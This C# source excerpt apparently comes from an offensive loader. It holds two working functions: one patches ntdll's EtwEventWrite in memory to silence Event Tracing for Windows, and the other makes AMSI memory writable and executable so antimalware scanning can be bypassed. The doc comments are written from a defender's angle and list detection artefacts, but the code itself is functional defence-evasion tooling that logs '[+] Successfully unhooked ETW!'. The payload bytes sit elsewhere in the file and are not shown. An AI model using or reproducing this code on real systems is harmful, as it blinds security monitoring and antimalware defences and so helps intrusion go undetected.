/// <summary>
/// Overwrites the entry of ntdll!EtwEventWrite in the current process with the bytes
/// returned by <c>getETWPayload()</c>. From a defensive standpoint this is an in-process
/// ETW tamper: the page is flipped to 0x40 (PAGE_EXECUTE_READWRITE) via a dynamically
/// resolved VirtualProtect and the original protection is never restored, so the
/// modified page stays writable+executable afterwards.
/// </summary>
/// <remarks>
/// Observable artefacts for detection: a VirtualProtect call targeting ntdll's code section
/// with an RWX protection, and an in-memory EtwEventWrite prologue that no longer matches
/// the on-disk image. Only the success path logs; a failed VirtualProtect is silent.
/// Note the local is named pEtwEventSend although the export resolved is "EtwEventWrite".
/// <c>GetLibraryAddress</c>, <c>VirtualProtect</c> (delegate) and <c>getETWPayload</c> are
/// defined elsewhere in the file.
/// </remarks>
private static void PatchETW()
{
    // Resolve the target export and VirtualProtect at runtime rather than via P/Invoke.
    IntPtr pEtwEventSend = GetLibraryAddress("ntdll.dll", "EtwEventWrite");
    IntPtr pVirtualProtect = GetLibraryAddress("kernel32.dll", "VirtualProtect");
    VirtualProtect fVirtualProtect = (VirtualProtect)Marshal.GetDelegateForFunctionPointer(pVirtualProtect, typeof(VirtualProtect));
    var patch = getETWPayload();
    uint oldProtect;
    // 0x40 == PAGE_EXECUTE_READWRITE; oldProtect is captured but never used to restore the page.
    if (fVirtualProtect(pEtwEventSend, (UIntPtr)patch.Length, 0x40, out oldProtect))
    {
        // Copies patch.Length bytes over the live function body in ntdll.
        Marshal.Copy(patch, 0, pEtwEventSend, patch.Length);
        Console.WriteLine("[+] Successfully unhooked ETW!");
    }
}
/// <summary>
/// Changes the protection of the memory at <paramref name="amsiLibPtr"/> to 0x40
/// (PAGE_EXECUTE_READWRITE) for as many bytes as <c>getAMSIPayload()</c> returns.
/// Returns <paramref name="amsiLibPtr"/> on success and <c>IntPtr.Zero</c> (written as
/// <c>(IntPtr)0</c>) on failure. This only prepares the page; no bytes are written here.
/// </summary>
/// <param name="amsiLibPtr">Address whose page protection is changed; assumed by the caller to lie inside amsi.dll — not validated here.</param>
/// <returns>The same pointer on success, zero pointer if VirtualProtect fails.</returns>
/// <remarks>
/// Defender notes: like the ETW patch, the previous protection is captured and discarded, so
/// the region remains RWX. An RWX VirtualProtect against a loaded AMSI module is a strong
/// telemetry indicator of AMSI tampering. Zero is returned on failure rather than an error
/// code; no reason is surfaced to the caller.
/// <c>GetLibraryAddress</c>, <c>VirtualProtect</c> (delegate) and <c>getAMSIPayload</c> are
/// defined elsewhere in the file.
/// </remarks>
private static IntPtr unProtect(IntPtr amsiLibPtr)
{
    IntPtr pVirtualProtect = GetLibraryAddress("kernel32.dll", "VirtualProtect");
    VirtualProtect fVirtualProtect = (VirtualProtect)Marshal.GetDelegateForFunctionPointer(pVirtualProtect, typeof(VirtualProtect));
    // Receives the old protection; despite the name it is never applied back.
    uint newMemSpaceProtection = 0;
    // Size is taken from the payload length, so getAMSIPayload() is invoked once here purely for its length.
    if (fVirtualProtect(amsiLibPtr, (UIntPtr)getAMSIPayload().Length, 0x40, out newMemSpaceProtection))
    {
        return(amsiLibPtr);
    }
    else
    {
        return((IntPtr)0);
    }
}